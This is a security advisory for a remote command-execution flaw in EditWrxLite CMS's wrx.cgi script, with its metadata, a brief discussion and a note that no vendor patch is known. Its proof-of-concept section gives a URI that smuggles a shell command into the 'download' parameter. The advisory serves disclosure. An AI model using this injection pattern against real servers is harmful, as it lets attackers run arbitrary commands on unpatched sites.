EditWrxLite CMS 'wrx.cgi' Remote Command Execution Vulnerability
BID:51995
Info
EditWrxLite CMS 'wrx.cgi' Remote Command Execution Vulnerability
| Bugtraq ID: | 51995 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 13 2012 12:00AM |
| Updated: | Feb 13 2012 12:00AM |
| Credit: | chippy1337 |
| Vulnerable: |
WrxWare EditWrxLite 0 |
| Not Vulnerable: | |
Discussion
EditWrxLite CMS 'wrx.cgi' Remote Command Execution Vulnerability
EditWrxLite CMS is prone to a remote command-execution vulnerability.
Attackers can exploit this issue to execute arbitrary commands with the privileges of the affected application.
EditWrxLite CMS is prone to a remote command-execution vulnerability.
Attackers can exploit this issue to execute arbitrary commands with the privileges of the affected application.
Exploit / POC
EditWrxLite CMS 'wrx.cgi' Remote Command Execution Vulnerability
The following example URI is available:
http://www.example.com/editwrx/wrx.cgi?download=;uname%20-a|
The following example URI is available:
http://www.example.com/editwrx/wrx.cgi?download=;uname%20-a|
Solution / Fix
EditWrxLite CMS 'wrx.cgi' Remote Command Execution Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
EditWrxLite CMS 'wrx.cgi' Remote Command Execution Vulnerability
References:
References:
- EditWrxLite Homepage (WrxWare )